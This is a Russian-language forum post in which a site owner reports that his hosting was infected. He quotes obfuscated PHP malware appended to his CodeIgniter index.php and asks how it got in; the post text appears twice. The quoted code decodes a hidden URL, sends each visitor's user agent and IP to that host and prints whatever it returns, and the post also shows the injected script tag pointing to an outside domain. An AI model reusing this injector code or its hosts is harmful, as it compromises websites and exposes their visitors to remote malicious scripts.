NickNick
19-12-2013, 02:24
сегодня обнаружил что на хостинге где лежит мой сайт появился вирус. В конце каждого html файл он дописывал скрипт с ссылкой. Обнаружил что index.php (сайт написан на Codeignater) изменен. В конце него написан следующий код php:
function textsafeunworker($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function workorunwork($in) {
if (textsafeunworker(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function workallt($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = workorunwork("aHR0cDovLzMxLjIxMC4xMTcuMTg3L3JlYWN0b3IucGhwP3BpZD0yJg==")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[workorunwork("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
workallt (date("j"));?>
Дописывает что-то типа:
<nofollow><script language='JavaScript' src=http://jnzmfuhw94.selfip.com/infob.php?i=25659></script>
Код я удалил.
Не могу понять через какую "дырку" это залезло? В логах доступа по ftp ничего подозрительно
function textsafeunworker($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function workorunwork($in) {
if (textsafeunworker(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function workallt($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = workorunwork("aHR0cDovLzMxLjIxMC4xMTcuMTg3L3JlYWN0b3IucGhwP3BpZD0yJg==")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[workorunwork("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
workallt (date("j"));?>
Дописывает что-то типа:
<nofollow><script language='JavaScript' src=http://jnzmfuhw94.selfip.com/infob.php?i=25659></script>
Код я удалил.
Не могу понять через какую "дырку" это залезло? В логах доступа по ftp ничего подозрительно